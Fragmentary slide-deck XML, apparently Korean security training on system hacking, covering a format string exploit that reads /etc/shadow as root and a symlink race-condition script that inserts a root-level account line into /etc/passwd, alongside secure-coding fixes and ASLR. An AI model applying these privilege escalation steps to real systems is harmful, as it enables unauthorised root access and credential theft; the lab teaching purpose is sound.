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93A1F-D62F-40FF-93DD-B369D1773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757019-3A2F-4410-BCB3-D08711A52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28803-96D1-4A3E-B994-290277F2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A7E1E-6A67-4A33-B4F1-225AB5A0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2A18C6-5926-4F5E-BB74-882C1F8C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701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E069A-232E-4F00-94C5-C71D99DB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F522EB-E7BC-47FB-A546-19272DD46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51B00-F1C5-4FE7-8051-E9B20210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796C99-E7D1-426C-A0A8-D54B69C48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3EE18-36B4-4B46-A660-F5F1657F6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061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92C82C-9386-4D0E-B5CD-FC6905FA1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16C72-842D-4962-A970-DAC3C672B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3BBCE-89BF-40DF-84D4-3060C3C6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7E148-CCC4-4EB2-933E-E163EDE3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BDB10-DCD3-459F-88D3-EB9D30A4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3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FF0B8-2E59-4A81-A042-B4987C2B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3BF5A7-FF09-471A-82D4-AFD56EF0F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70701-2AF6-4131-B4C5-C453EB04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012A02-4F1E-4076-950C-1CD4AF58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80325B-B5FA-400B-A3C9-487D59D6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71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D077-4FFF-4A3C-8E82-3EC307C2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C89C5F-A5C6-4665-96A9-C6DE84ACF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C502D-7338-4084-AB4F-D4E8C2F8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5CA9A-88C1-4E98-B1B6-1B134B67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B0087-659F-42ED-BBD9-99C41D5E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FC552-1640-4F71-8E9F-16A832EA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5DBF12-FFB5-4196-9C37-220867ACC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A33CF4-94EA-4C7E-981F-7595F26DC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911DB-365E-4DEB-83F0-9100CE77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096D9A-7538-4C2D-88C7-5EDBDE5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0B66A7-66F0-4BE1-A6DD-5E70E831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48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CDEF4-6200-451A-9665-421AAA28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26DDD-D4CC-448F-B39B-B8F03E02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3C0476-F231-4096-8C3D-DFEA3F7B6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C90F81-370D-489F-80BB-7190CE167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0560B0-0179-4038-856D-B1306E38E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AEEA07-BD10-41F9-AD37-824FE983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4DA496-C5ED-4D18-BE87-58733189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10C4F7-38DA-463E-8CD9-E0EE6591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6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82D9A-3071-4DC5-951C-1FC121CF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25E621-C677-49DE-8133-48DC7D2E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EB0B7C-A81A-4AD8-97CF-AA4E8687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782798-B246-495F-A9C0-15B8AFB6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72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49D4A7-E019-47CA-ACDF-DC9D7DB8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01EADF-0738-4093-AC37-F738B086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6FA17-3B30-48C4-A9BC-541C85B1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E2737-9447-442F-A4DD-D6F1CAC4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14D23-6538-4A89-95C9-76A4505E4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4B4CE1-0A4D-4AF9-BFEB-C95F97F4F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D181A-906C-4F09-B591-677AB76BB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D0C3F-8A15-403D-A512-995B2A67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77BF1D-10B2-479A-BA13-AEE24C71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93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B0F0D-AE7B-48B2-8C67-D2D546A8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4548BD-6CAA-46B2-8CD8-E86D6084B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D8C27C-1040-4327-8B99-6AEDD36DC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04A80-E0B7-4483-88F0-62C714AA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1A68A6-C22F-4316-B6CE-A62AC58C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2DFF45-CE9E-48C7-9589-0E67FF34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75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54A81A-2652-457B-A13A-E7FC64AD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AF9C44-EDF6-4CF3-A20D-B781D9664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564E5-1782-44FB-9982-F721750E0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5425-99FC-40E2-9645-DBCC94505CD7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680BD-1E23-4B54-B14A-2E4F8DF6E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8B7A0-48DE-4061-8728-E7B334E4C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8D88B-8476-48E5-AC0A-1D5FEE8A01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2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b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bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image44.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image43.b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bm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b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mailto:test01@10.10.1.1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4A43D-701B-4707-8049-8D7E0FB43D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정보보호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DA22DF-4B45-48FB-9681-9DACF44B6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6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>강</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>system hacking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96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test </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>계정으로 전환 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>디렉터리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err="1"/>
              <a:t>su</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> test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다음 명령을 입력하여 루트 권한으로 명령을 실행할 수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"\xa0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</a:rPr>
              <a:t>\xea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xff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xbf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>"+“%08x.%08x.%08x.%08x.%08x.%08x.%08x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.%76x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.%08n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>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루트 권한이 필요한 명령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/>
              <a:t>cat /etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/shadow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루트 계정으로 복귀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exit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en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>fmtstring.c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코드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vi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fmtstring.c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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>함수 사용으로 포맷 스트링 취약점이 존재함을 확인</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 130">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71289408-266B-4678-95B9-C39EDF85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2" y="1729482"/>
            <a:ext cx="4877816" cy="12682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32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3280749-911A-45C3-8C2E-C33736B1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2" y="3621892"/>
            <a:ext cx="4954016" cy="279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34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{208F48A0-69F8-402A-952F-CA7A5DE02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9" t="-234" r="863" b="753"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6308408" y="1284923"/>
            <a:ext cx="4852987" cy="2671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9D2AEFF-8CF0-49A0-927A-B5C82098C446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C9A5848-E5CB-43F1-A00B-BA470793D55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7FF679-B2B6-4EE4-AE91-1C58DA2E106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화살표: 오른쪽 11">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3211556C-9FC5-43F2-AB3F-012AF3CB22E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01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취약한 부분 수정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시큐어</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 코딩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→ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>strncpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (buff, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>], sizeof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(buff));</a:t>
            </a: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재빌드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–o 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fmtstring.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> getRoot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>.o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ASLR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="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sysctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>w kernel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>randomize_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>va</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>space=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="10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9515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Picture 139">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C5C04B0-1A90-499C-B432-34A9F9351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" t="833" r="930" b="605"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="511493" y="875348"/>
            <a:ext cx="4791076" cy="264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36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{065DD0D5-E074-41EA-BCE1-13FD88348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13394" r="804" b="69595"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="511493" y="4093465"/>
            <a:ext cx="4905375" cy="5476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41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92AFE8B1-4B5F-452F-B39E-14DBCF128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" t="13987" r="271" b="75784"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="511493" y="5147503"/>
            <a:ext cx="4830128" cy="32365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8CA100-2841-49EB-8217-4CDEDF3A1B35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6289547" y="475614"/>
          <a:ext cx="5390959" cy="3661855"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5390959">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="372272330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33575"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="30365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활성화하면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변수의 주소가 실행할 때마다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변경 없이도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포맷 스트링 공격의 방어가 일부 가능하다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공격자는 스크립트 등을 사용하여 성공할 때까지 반복함으로써 공격을 성공시킬 수도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156445"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="69633" name="_x617883232">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39EC40B8-29EC-4CEF-8198-5077B2CA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91" y="1769617"/>
            <a:ext cx="4656138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37817-B378-4F35-A9EA-71E314E5D783}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183086" y="4427156"/>
            <a:ext cx="5616792" cy="206184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52992D-89AA-4557-8A7E-3CEA4DC34DE9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F08279E-FB10-4051-90A5-E67F06C4451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F1610-51F2-4B72-AB4A-21A27FBCFD84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94A9E8D8-C704-4701-A3CC-FBC68C50E61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00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/Training/Unit/Sys/12</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 12. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>권한상승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권한 상승을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시도하시오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/passwd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다음을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삽입하시오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insertid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::0:0:root/root:/bin/bash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Race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538BE9-0F18-4003-8306-155BFA142528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B521C6A-9D1B-4168-9D71-F74E0CB2B84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531C44-A68F-44A5-A3F3-AE979F4702B4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DB511F47-AF8A-40A6-A03A-3F2AD77B4E2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78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 이동 및 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec/createTempFile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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>l createTempFile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/sec/createTempFile.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>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vim createTempFile.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>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/sec/createTempFile </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일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./createTempFile Test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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/tempfile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 err="1"/>
              <a:t>명령행</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 인자로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>넣은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>Test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>가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tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/tempfile </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일에 추가됨을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/>
              <a:t>/sec/exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.sh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일 작성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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec/exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.sh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5" name="Picture 143">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA5976D8-17E7-43BF-8A40-C0278FA2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" y="1100666"/>
            <a:ext cx="5135880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45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D4EE6A3-1744-4DB6-B5B7-AB94CC2FE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2144606"/>
            <a:ext cx="5400040" cy="299059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DDACDB-0DED-4220-B383-66DCD44E56F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="500380" y="5200516"/>
          <a:ext cx="4968748" cy="736346"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4968748">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="8226148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설명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3199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작성된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바이너리의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삭제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(remove),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생성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(fopen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내용 추가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수행한다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415954"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 147">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE5E00B4-9767-417D-9C4B-7708EA208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40" y="1100666"/>
            <a:ext cx="4594860" cy="807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49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5479E1B6-BC9D-4A77-B2E9-E7F8136EB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2800520"/>
            <a:ext cx="4877816" cy="2956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A7A495-4F39-4ADB-A49B-594268D86A0E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71771AC-7B5A-4261-A791-EF95D763969B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EADCBA-1F72-4907-802E-B7190469A58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9557721A-FEB9-47FE-AF62-DF8AA5EB0FC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7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en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec/exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.sh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>실행 권한 부여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755 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec/exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.sh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en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec/exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.sh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>실행 및 권한 상승을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>통한 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/passwd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일 조작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/sec/exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.sh 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B0495DD-15AA-42C8-99DA-D6EE22C9BA67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="482536" y="501301"/>
          <a:ext cx="4932807" cy="244322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0464765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215407"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1860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"$old" ==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"$new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];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insertid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 &amp;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echo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"STOP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... The passwd file has ben changed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07326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7BED53-6299-4A40-B0C5-1A7D3EC54E1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="482536" y="3082831"/>
          <a:ext cx="5280914" cy="3105372"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5280914">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="342704905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설명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00559"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1637506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작성한 쉘 스크립트는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바이너리를 실행하여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::0:0:root/root:/bin/bash”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저장되도록 하면서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링크가 되도록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성공할 때까지 위를 반복한다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성공하면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파일의 크기 등이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ls -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명령의 출력 결과가 공격 이전과 달라진다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이용하여 반복문을 벗어난다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67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"$old" ==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"$new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];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99769"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 151">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{139E61FA-04B8-4C98-B644-4375D766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340" y="894926"/>
            <a:ext cx="50139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53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04DB0B6D-C6B2-4A41-9210-653C8E5A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0" y="2144754"/>
            <a:ext cx="4381500" cy="278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DA5B94-3569-4EE5-ABD1-9698CB908CF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2560571-A7C6-45E3-8D0C-5723ABFE29C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8C6A0-1564-4EED-A362-90F0BA93247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4B4AD2C1-C6C1-409C-AAD1-A6C6D29AC97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32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3C7773-1E01-4A87-A5D3-84602AC344BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="492315" y="531781"/>
          <a:ext cx="5004689" cy="1955546"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5004689">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="284761806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364398"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1453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성공하면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파일의 크기 등이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ls -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명령의 출력 결과가 공격 이전과 달라진다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이용하여 반복문을 벗어난다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"$old" ==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"$new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];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=`ls -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168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783ED4-2DC3-467F-ACA5-CF48357CCA16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6286917" y="531781"/>
          <a:ext cx="5412768" cy="5800500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 스크립트에 의해 실행된 프로세스들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(createTempFile,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ln)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병렬적으로 실행되는 것이 아니라 컨텍스트 스위칭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(context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switching)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번갈아가며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다음 그림과 같은 형태로 실행될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pic>
        <p:nvPicPr>
          <p:cNvPr id="77828" name="_x618145072">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B94716C9-27FA-45D6-8605-777D15AE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23" y="1745774"/>
            <a:ext cx="5199062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A30C07-719D-408A-92F7-58BAD7D1A866}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="492315" y="2788531"/>
          <a:ext cx="5412768" cy="3629183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20710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34111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파일 삭제 이전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파일 삭제 및 파일 생성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413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 존재하지 않으므로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소프트 링크의 소유자는 쉘 스크립트를 실행시킨 계정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375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fopen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연다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링크이므로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열게 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바이너리에는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부여되어 있으므로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소유의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열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362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바이너리의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함수에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의해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입력한 내용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(insertid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추가된다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6EF7B63-D41B-41A6-BA16-FE86C4B459F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5905500" y="3764280"/>
            <a:ext cx="381417" cy="22098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C8696C-F9A9-4276-AD2C-4B567D27DFC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F2F096D-8477-4D4C-9E6A-C9F36C0C64C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0C6E2B-64BE-48D0-9A75-06D624ABA09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A0E72452-24B6-413E-8CEF-6EA8F5EEFF76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55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4905" y="368998"/>
            <a:ext cx="5616792" cy="53231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_x1658365728">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BC1404B-71FF-41DC-B4B6-05D45500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3" y="943068"/>
            <a:ext cx="4622147" cy="3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1659855720">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7205F5AD-930B-4C48-A1F2-2B29EB9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04" y="798418"/>
            <a:ext cx="5199062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E27505-0E1B-4441-8F86-6B6670D21030}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6286917" y="531781"/>
          <a:ext cx="5412768" cy="5068980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파일 닫기 이후 소프트 링크 생성 시도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62611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31B4F6-AB67-476A-AAE5-CDE1906087FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="494134" y="572958"/>
          <a:ext cx="5412768" cy="5801071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파일 생성 및 내용 쓰기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48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/sec/createTempFile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바이너리에는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부여되어 있으므로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fopen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의해 생성된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소유로 생성된다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파일 쓰기 및 파일 닫기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/tempfile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290BCC-9756-4035-B1DE-175E2F95E67D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183086" y="5763544"/>
            <a:ext cx="5616792" cy="7254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acheck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acheck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D0A75-2BC9-477F-8697-646CB7E31E4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83387A-B307-4357-A242-F58470265E0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F2AA83-5D2B-477F-A5C7-58C3C73712F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497606A9-9E81-4DE7-B9F0-D65E6DDD3BDA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629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67D80079-A11C-43EE-9972-D3F4784D0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/Training/Unit/Sys/12</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 12. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
